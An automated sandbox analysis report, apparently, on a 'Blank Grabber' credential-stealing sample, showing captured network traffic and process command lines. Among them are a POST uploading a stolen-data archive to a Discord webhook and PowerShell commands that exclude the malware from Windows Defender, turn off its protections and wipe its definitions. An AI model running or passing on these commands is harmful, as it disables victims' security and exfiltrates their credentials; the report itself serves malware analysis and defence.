                                                                                                                                                                    Dec 6, 2023 09:24:36.472079039 CET170OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    User-Agent: python-urllib3/2.1.0
                                                                                                                                                                    Dec 6, 2023 09:24:36.935125113 CET408INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Wed, 06 Dec 2023 08:24:36 GMT
                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                    Content-Length: 177
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 30
                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 74 72 75 65 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 22 7d
                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"District of Columbia","timezone":"America/New_York","reverse":"","mobile":false,"proxy":true,"query":"102.165.48.83"}


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449743162.159.136.2324437484C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2023-12-06 08:24:37 UTC302OUTPOST /api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC HTTP/1.1
                                                                                                                                                                    Host: discord.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    Content-Length: 696433
                                                                                                                                                                    User-Agent: python-urllib3/2.1.0
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=e3d1360ad0622e034bb000d4c8b44246
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 2d 2d 65 33 64 31 33 36 30 61 64 30 36 32 32 65 30 33 34 62 62 30 30 30 64 34 63 38 62 34 34 32 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 ef 19 79 7d 21 04 00 00 01 0f a8 7a 1c 66 f3 7d ae a7 4e e0 df b4 41 c4 4c 5d df 01 52 57 74 68 83 bd 51 0d 67 f8 46 09 08 36 92 e8 dd 90 d6 a0 8c a3 66 1f f4 96 cb 98 89 02 c3 a9 ca 9e 1c e6 fa f0 f1 24 61 f5 f2 38 49 52 52 77 c3 d1 ea 6b d2 0c be 7b 1f 7e 23 f6 f4 e2 8f d1 37 38 1f d0
                                                                                                                                                                    Data Ascii: --e3d1360ad0622e034bb000d4c8b44246Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!y}!zf}NAL]RWthQgF6f$a8IRRwk{~#78
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 2f 6b 2c e6 5b 2f 91 0c 70 ec 71 3e 75 ce 0a 0c eb e0 bb 08 55 0d 4b 2a d7 0b 1f 81 d4 5d e4 76 45 20 ec 74 43 8d 09 52 92 f6 2d 7d ee e9 69 98 f8 47 fb 5e 01 1a 53 fc a2 8c 85 7c 33 78 cc 02 d8 82 10 1e 15 20 4d fa 2a 3b 60 3f 1b 6d eb 48 23 51 d5 ed 6b 7c 2c 8e b0 61 ae 2d 43 6d 9f b6 45 a6 65 6f 39 96 b0 b3 d4 79 ff 99 17 d1 a5 87 98 14 5b 5f 5d 06 95 3e 40 af e9 29 7a ef 0e cd 34 d3 e6 9d a5 0b 3a 7d 90 a9 45 cf c8 44 07 61 73 54 d9 71 e0 2b 61 1e 34 fa d9 28 87 0f 0b 59 fc 85 0f 9e 91 e5 cd b1 52 63 61 13 ba a1 71 50 bd 5e 93 14 14 68 de c8 c6 f7 53 3d a8 f5 f8 02 dc 0c 3f c8 b3 83 84 6f 31 b0 98 a8 99 b7 b6 e7 a9 74 81 48 c2 61 b2 71 06 11 8e 2a 79 14 77 35 c7 37 75 72 b7 22 62 df 33 74 70 b9 5d 12 0c 39 45 0d 19 ed af 31 d0 1b ab 0f 5d 1c f1 53 72
                                                                                                                                                                    Data Ascii: /k,[/pq>uUK*]vE tCR-}iG^S|3x M*;`?mH#Qk|,a-CmEeo9y[_]>@)z4:}EDasTq+a4(YRcaqP^hS=?o1tHaq*yw57ur"b3tp]9E1]Sr
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: f1 1a 86 4b 5b 0f 54 7e 75 6a 99 d6 f8 8d bd 06 fb ea ae 23 64 14 a9 65 64 36 fb 2b ea 95 27 38 c3 2c 8c e8 1d 27 55 9a aa 1b bc 52 a4 2b 87 42 09 fa 29 00 fa ce 3d 2c 01 8c c6 8c 61 97 6a 89 b4 0d 77 66 52 ca f9 ee 07 59 6f bc 7a 18 65 61 a8 c6 54 87 0f 67 9c 7b 11 2b e4 39 4b 92 d3 7d c1 85 d1 45 e5 54 b4 1d 8a b4 eb b9 2f 68 12 b3 50 e9 7c 3c 8f 2f fe 6d f6 1e 43 f5 c9 08 aa 47 cb cd 40 dc 2e 6b be 60 af 09 3f 58 4b f2 d8 54 17 81 60 13 8f 5f 2f a5 e9 0f 4f e5 aa 55 58 e8 da fc 20 8a a5 0c 4d 90 60 4e 45 9e f2 1c 66 73 a3 cb f2 73 70 41 ca 56 e7 c5 ce 69 2b 00 b6 d6 7f 7f 72 42 49 43 f8 3c b8 b0 c3 0d f6 d7 e0 e2 b0 17 db c2 d4 b3 c3 b5 a1 fa ca 64 97 c8 c2 c8 2d 80 db 08 6c 2b 10 68 f9 eb fb c9 42 3d aa 1a 1c 06 fc 56 63 67 08 8b f5 a5 85 83 b4 fd 74
                                                                                                                                                                    Data Ascii: K[T~uj#ded6+'8,'UR+B)=,ajwfRYozeaTg{+9K}ET/hP|</mCG@.k`?XKT`_/OUX M`NEfsspAVi+rBIC<d-l+hB=Vcgt
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 16 5f 93 62 20 33 d8 8c fe 9f dc 2b 61 24 e2 3e 99 0b c0 8d cb 76 0c 88 8b bf b3 ce d4 06 36 ac fe e5 9c 36 cd 01 1b 29 0e c6 2a 36 59 4e af 6c 1a 01 15 33 b1 f4 d3 e2 0b b6 6d 91 ed 10 4b 81 0d fb 4a 7f 2a db e9 9f 4f 1d c6 f1 d7 8f eb 53 7e 3d 03 80 43 ef 67 f9 d1 74 17 f2 5c 15 43 4b d4 e0 03 77 9e a3 2d 54 76 db 08 c3 80 46 19 b8 7c d2 92 59 50 82 eb 8a eb 8b f4 5e 51 b2 eb cf 25 b5 3d dd d3 83 04 31 e2 bb d3 d5 16 10 a5 e2 7c 4b d0 6f 4a ca 35 97 50 42 9c ad fa b7 a8 64 ac 92 07 bd c0 57 7b 9d ff a4 fb 3a 4a 7c 09 f1 03 df 4c c1 0b 72 13 2a 90 32 2b 9d f1 cf f3 1b 40 6c d5 02 45 63 05 49 dd a5 e0 47 e3 78 b4 5d 24 df 02 bb 7f 0d 3a 30 ba af 8a f2 8d 87 76 8f 42 c4 f1 f1 41 14 b6 25 7d b5 10 4c 4a c2 f0 a4 38 77 29 7b 69 bf 86 54 a8 04 a7 ee 50 fa 26
                                                                                                                                                                    Data Ascii: _b 3+a$>v66)*6YNl3mKJ*OS~=Cgt\CKw-TvF|YP^Q%=1|KoJ5PBdW{:J|Lr*2+@lEcIGx]$:0vBA%}LJ8w){iTP&
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 36 c3 c6 11 da 8f 1e 6c 7b fe 43 67 46 e0 ba 93 08 f1 91 5e 7d 52 d0 e7 37 74 c3 41 71 77 f1 20 ed 5c 08 7c e0 f5 61 76 fd 60 65 73 4c 7c 3d 47 fe 11 71 e6 22 06 5a 8b 95 83 9a cf a9 e3 27 65 f5 48 82 50 a1 96 c0 e6 ad 80 0c da b7 7f cb 7e c3 c4 ce 09 5f c1 2d cc d7 ad 5e a8 49 e0 a3 4c f2 80 39 52 3b 9b 9f ec 89 ca d0 03 06 01 ab 27 d9 b2 ba 48 61 64 53 b6 5f 5e b3 3e f6 6d f2 aa 49 3f e8 1c b6 0a 2c e9 d1 a2 e4 a6 ad 05 f8 a0 b4 34 11 04 53 af ed e6 4a 10 69 82 f9 06 5a 39 1b 11 48 75 ef e8 e8 e3 e3 c5 bd de 46 72 df 73 fd 31 ea 27 eb 45 43 1a ae a7 16 86 8b 77 3d 7d 8f 30 a8 1a 43 d5 6c 37 b1 0d 79 9e c9 a0 76 97 db be c5 35 d0 18 b0 0b f9 ac c3 14 a6 a2 4e 9c 9c 4a 3c 04 92 ec 19 79 05 f8 30 55 e0 58 63 54 6d ff 02 e8 f4 1d db 2f fc bd 87 74 b2 37 1c
                                                                                                                                                                    Data Ascii: 6l{CgF^}R7tAqw \|av`esL|=Gq"Z'eHP~_-^IL9R;'HadS_^>mI?,4SJiZ9HuFrs1'ECw=}0Cl7yv5NJ<y0UXcTm/t7
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 9e 97 1b 17 a3 72 a5 f0 4e c6 1a 23 9d dd a8 4f 64 9c b5 66 34 3b 59 e8 23 14 70 62 52 d6 2c 99 12 8a 9f 3b 9a d5 69 d0 9e cb b0 45 08 8c e7 e3 49 5f bc e6 ff 98 37 af 7a 61 da b3 a6 94 a5 e7 7c 13 a0 9c cd 8c 61 5b ae 41 fe 18 da 05 36 f4 f5 66 8f b7 19 44 74 a0 d1 a5 0d 21 86 8f c7 b5 3c 55 88 7f 10 ca 6c b4 ef 25 d8 02 81 48 15 ca 9a 97 02 f9 b9 d3 fb 77 fb 81 fa ed 83 c9 19 67 38 2d a8 db 46 09 bb be bc 49 78 49 f6 a2 f4 ba a5 83 94 ea 21 0f cd 1b e8 1b 95 38 d5 ef 6f 10 5e 28 73 a1 bc 5f 8b c2 c5 e2 a9 c5 64 c7 de b1 cb 72 d8 b7 b5 40 a9 f7 a7 1e 1c 19 12 99 ad d2 22 c1 19 c2 21 e0 5e 5a cf 6c f0 10 18 b8 7b ef 43 ca 86 d5 d5 c1 31 7d 19 06 b3 10 e7 f9 e5 a3 63 bd 45 88 78 f9 ed e7 71 3a 9c 54 ae 3d c6 1e b2 9a 36 15 da 89 08 40 89 09 a0 a3 86 db 97
                                                                                                                                                                    Data Ascii: rN#Odf4;Y#pbR,;iEI_7za|a[A6fDt!<Ul%Hwg8-FIxI!8o^(s_dr@"!^Zl{C1}cExq:T=6@
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: db 97 27 23 70 ea 8d 3f 0c 36 74 02 4c 88 6d 4b d7 a6 ec fb 05 b2 23 04 51 ce 84 58 b3 f8 b9 de 06 9a 97 ec 60 b6 41 04 91 d5 76 fe 70 6b df 53 0a a0 73 82 93 5a e2 14 d7 af 6a d8 12 c7 c0 2d 72 0b 33 70 63 0e 74 0c 6b 94 52 61 c7 6a 26 dc dd 71 fb 10 8b 5e 7d 5b 62 0f 26 ab 7c 37 1a 7b 95 ed 5a b9 bf 13 a9 93 30 2a 16 f7 62 56 00 e6 1c d3 c6 ed 50 8a 76 1d 74 58 a1 5f 09 bb 46 89 9c 88 53 40 0b 69 e7 c1 c8 af 16 f4 84 5e 04 46 73 d1 4a 20 1c db b3 aa 39 15 ae 0e 62 b8 57 49 08 c0 13 70 cd be 4b 77 2f 5e da f9 cb f2 ae e9 e4 7f 1c 7a 8c c7 4f b9 f2 98 af 6d 38 ab 9c 3a ad 2e f5 8f ce 51 fd cf 79 6c cf f3 cd 3d e4 49 88 63 ee 7b 10 f5 82 a4 a5 a7 0c 7f 4c 29 a0 ac e0 fb 69 b0 dd 04 8d b2 43 a0 b0 18 6b f3 37 09 5b f1 35 a8 62 4c 2c b1 18 73 5e ee 43 f7 f3
                                                                                                                                                                    Data Ascii: '#p?6tLmK#QX`AvpkSsZj-r3pctkRaj&q^}[b&|7{Z0*bVPvtX_FS@i^FsJ 9bWIpKw/^zOm8:.Qyl=Ic{L)iCk7[5bL,s^C
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 9b e5 7c a8 34 ab e3 42 7c 0b b3 a9 18 fb 0c 70 59 fb 92 1c 2c fc 86 1f 8f 15 27 20 0a 1c fe 27 33 0f 1b 49 a9 94 0a a0 32 17 22 e1 b3 9b d0 b6 53 fd 78 50 1a 6c a1 89 e5 8e e3 a6 fc 25 2b 52 ab 92 33 a8 ca ea 2a 55 50 57 8d 21 4e c2 ba 67 98 3f 58 64 ce d5 33 22 28 d4 8e bc 0d 40 9c 48 b3 3b e9 ec 1c e1 b7 07 b4 4e 62 85 64 be 76 b7 fc b8 96 e6 cc 61 2e 14 e0 02 f6 30 45 0f ba 75 56 0b fa 08 1e 8b d6 82 13 0d b4 d9 b7 96 76 20 74 14 3c 1d 49 fe 57 0e b8 86 dd be 5e 6e 49 ac 0d 5a c4 d3 c9 5e 63 fd b4 1f 6f 44 0f 82 c4 c5 dc 40 4b 4d 6c 53 6a fe 04 9d 10 bb 11 75 9a 2d 45 e8 a4 da f1 d8 4c 69 77 dc da 17 96 17 f4 53 63 e5 c4 ca 99 85 0a 5b b2 51 e2 31 64 5d 60 ed 1a 33 10 64 aa ca f8 df 26 36 64 fc 46 bc 18 f3 07 16 02 cc 8c 21 5f 62 27 f1 38 9d 3a 67 f1
                                                                                                                                                                    Data Ascii: |4B|pY,' '3I2"SxPl%+R3*UPW!Ng?Xd3"(@H;Nbdva.0EuVv t<IW^nIZ^coD@KMlSju-ELiwSc[Q1d]`3d&6dF!_b'8:g
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: 37 28 e4 99 bd a9 80 88 c2 87 a8 c0 1a 8e 8b 1a c2 53 00 d2 c4 5a 34 1d 66 c1 35 ee a3 d1 e5 cd 95 23 a9 f6 9d 69 8d 15 d5 4a 5d 79 82 c5 12 4b c3 43 ea 66 3d a5 e8 3b 6b e6 e8 90 b4 ce 77 cd dd dc 49 32 40 b0 e0 25 fc 98 2b 50 80 6d 56 ab 76 18 0c 1a ba 97 c4 e7 0b 07 51 3d 24 23 94 0a 8d 44 1a c1 48 ed 79 3d d9 02 36 b9 1f 24 a9 1f e6 5c a5 13 93 5a e9 ed eb a3 31 62 95 2f 0e 4a bd d5 21 65 14 db 8c a8 ee ea 29 62 87 55 27 de ce a0 16 b7 88 54 37 63 53 06 87 dc aa cb 0a 22 0e c2 c3 d5 e6 26 55 ec 8f a4 94 fe 4c 97 73 fc 90 71 4f 0e 9b dd 90 da 80 83 42 7d 57 06 eb 45 52 ef 04 55 50 c5 f5 ba c3 e6 56 95 ff a8 7b 61 1e fd 21 a3 60 dc 18 ac 54 b6 bc 01 76 84 92 4b ad 39 54 ca 31 db 4c d3 61 7c bd d0 6c 0f 42 99 bc eb 81 e0 13 0b 6d 3d 8d 3a 5c 29 3d 13 4d
                                                                                                                                                                    Data Ascii: 7(SZ4f5#iJ]yKCf=;kwI2@%+PmVvQ=$#DHy=6$\Z1b/J!e)bU'T7cS"&ULsqOB}WERUPV{a!`TvK9T1La|lBm=:\)=M
                                                                                                                                                                    2023-12-06 08:24:37 UTC16384OUTData Raw: cd f6 f4 97 13 33 0e ac 09 21 de 84 4f 17 9a 3a e7 ac 9f cc 13 f9 96 a2 33 5b 0f 72 db 44 6b 83 37 4d 35 67 08 8b fe db 8a 38 ed 6f c9 28 1b 80 66 79 70 7a bd fa 96 a4 fc f9 2e d2 78 a6 0e 02 18 47 22 4c 2f de 6e 3f 6d 69 3b 92 c5 43 cd f8 37 1c 88 b9 6f f7 84 18 f8 7b c8 08 98 e6 de 17 c6 aa cc 18 78 98 7e c2 28 4c 93 14 32 3b 5e c7 d6 0c 40 a1 b6 52 f5 67 6b ba 1a f4 96 c9 9c 24 4f a7 b1 8a 65 14 32 ab 6e 9d c4 6a c0 df b9 13 0c c4 e2 70 36 e5 16 f3 f2 bc da 39 e9 a9 01 11 08 21 10 be a4 cb 44 a3 0b 83 a2 59 cd 48 08 50 be d8 9a 46 4c e8 4b e4 54 20 3e 36 b9 ce 38 2e 64 eb 03 f4 0c fd 02 f9 5b c4 50 b2 31 0e 21 c5 63 e4 a5 7c a8 16 30 1d 63 e1 ac 7b 98 fd a1 04 6d ab 03 74 17 c6 4d 72 20 cd 71 7c b1 1e b5 12 b5 63 a0 96 0c ed 40 8a c9 79 d0 86 e5 70 28
                                                                                                                                                                    Data Ascii: 3!O:3[rDk7M5g8o(fypz.xG"L/n?mi;C7o{x~(L2;^@Rgk$Oe2njp69!DYHPFLKT >68.d[P1!c|0c{mtMr q|c@yp(


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:09:24:00
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Imagebase:0x7ff6313d0000
                                                                                                                                                                    File size:8'593'769 bytes
                                                                                                                                                                    MD5 hash:B5479BF5C97CFA81C02676BB9335AB24
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1656841633.000001FFF1DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Imagebase:0x7ff6313d0000
                                                                                                                                                                    File size:8'593'769 bytes
                                                                                                                                                                    MD5 hash:B5479BF5C97CFA81C02676BB9335AB24
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2027450507.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2028624518.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
